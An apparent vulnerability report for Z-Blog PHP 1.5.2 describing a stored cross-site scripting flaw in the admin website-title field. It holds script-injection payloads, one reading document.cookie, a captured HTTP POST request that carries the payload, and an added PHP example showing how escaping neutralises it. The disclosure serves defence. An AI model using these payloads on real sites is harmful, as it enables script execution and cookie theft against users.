Z-Blog php has a stored Cross Site Scripting Vulnerability
I have found a stored Cross Site Scripting Vulnerability.
Log into the system with an administrator role: http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php
Web site settings --> Basic setting --> Website title
payload: "/><script>confirm(1234)</script>
Save it.
If you get the admin privilege, we have so many self-XSS ways. This is just a functional bug which can break the management page.
By the way, we will fix this bug, thank you.
P.S. To save our time, please don't submit useless "XSS", and even some of which are features. For example, injecting "<script>" into article title or content.
exp
POST /test/zblogphp-master/zb_system/cmd.php?act=SettingSav&csrfToken=30440aaabfe797968365be7946a0fc8a HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/zblogphp-master/zb_system/admin/index.php?act=SettingMng
Content-Type: application/x-www-form-urlencoded
Content-Length: 1019
Cookie: timezone=8; username=admin; token=67afc0921f3adc02c6b8a8c32fa68c53ebac56e9a16a92342924e9d05609f78f1525347253; addinfotestzblogphp-master=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; PHPSESSID=sv1dq8htd2l5heme25b1b2vvb1; artshu=1; xiaoxi=%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_yi_jian_jian_yi_2821%2F+target%3D_blank%3E%E6%84%8F%E8%A7%81%E5%BB%BA%E8%AE%AEBUG%E5%8F%8D%E9%A6%88%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20171101+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.6%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_update_download%2F+target%3D_blank%3E20170804+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.5%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_mo_ban_xia_zai_3611%2F+target%3D_blank%3E20170804+axublog%E6%A8%A1%E6%9D%BF%E4%B8%8B%E8%BD%BD%EF%BC%9Auedc%E3%80%90%E9%80%82%E5%90%881.0.5%E7%89%88%E6%9C%AC%E3%80%91%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_0038%2F+target%3D_blank%3E20170619+axublog%E5%BB%BA%E7%AB%99%E7%B3%BB%E7%BB%9F1.0.2%E6%9B%B4%E6%96%B0%E4%B8%8B%E8%BD%BD%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog_jian_zhan_xi_tong_221437%2F+target%3D_blank%3E20170616+axublog1.0.1%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Fben_zhan_xian_zai_yong_de_hei_bai_190507%2F+target%3D_blank%3E20170614+%E9%BB%91%E7%99%BD%E8%93%9D%E4%B8%BB%E9%A2%98%E4%B8%8B%E8%BD%BD%3C%2Fa%3E+%3C%2Fp%3E+%0D%0A%3Cp%3E%3Ca+href%3Dhttp%3A%2F%2Fwww.axublog.com%2Fpost%2Faxublog100_jie_shao_he_181144%2F+target
%3D_blank%3E20170610+axublog1.0.0%E5%8F%91%E5%B8%83%3C%2Fa%3E%3C%2Fp%3E%0D%0A
Connection: keep-alive
Upgrade-Insecure-Requests: 1

ZC_BLOG_HOST=http%3A%2F%2F127.0.0.1%2Ftest%2Fzblogphp-master%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=zblog"/><script>confirm(1234)</script>&ZC_BLOG_SUBNAME=Good+Luck+To+You%21&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba%7Casa&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_ADDITIONAL_SECURITY=1&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=



payload: "/><script>confirm(document.cookie)</script>
Affected Version:
1.5.2
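Why the payload's leading `"/>` matters and how output encoding neutralises it, as an added example that is not part of the original issue and is not Z-Blog code. It assumes the saved website title is echoed into a double-quoted `value` attribute on the settings form; `render_raw`, `render_escaped` and `inspect` are hypothetical names.

```php
<?php
// Added example, not Z-Blog code. Assumption: the stored ZC_BLOG_NAME value is
// written into a double-quoted value="" attribute when the form is rendered.

// Constructed stand-in for the stored setting, using the payload from the report.
$stored = 'zblog"/><script>confirm(1234)</script>';

// Unsafe: the stored string is concatenated into the attribute unchanged.
function render_raw(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened: encode for the HTML attribute context at output time.
function render_escaped(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<input type="text" name="' . htmlspecialchars($name, $flags, 'UTF-8')
        . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '" />';
}

// Parse the fragment with an HTML parser and report what the markup contains.
function inspect(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate the broken markup of the raw case
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'input_value'     => $input ? $input->getAttribute('value') : null,
    ];
}

$cases = [
    'raw'     => render_raw('ZC_BLOG_NAME', $stored),
    'escaped' => render_escaped('ZC_BLOG_NAME', $stored),
];
foreach ($cases as $label => $html) {
    $r = inspect($html);
    printf("%-8s script elements: %d  input value: %s\n",
        $label, $r['script_elements'], var_export($r['input_value'], true));
}
```

In the raw rendering the quote closes the attribute early and the parser sees a separate `script` element; in the escaped rendering the whole string stays inside `value` and round-trips as text.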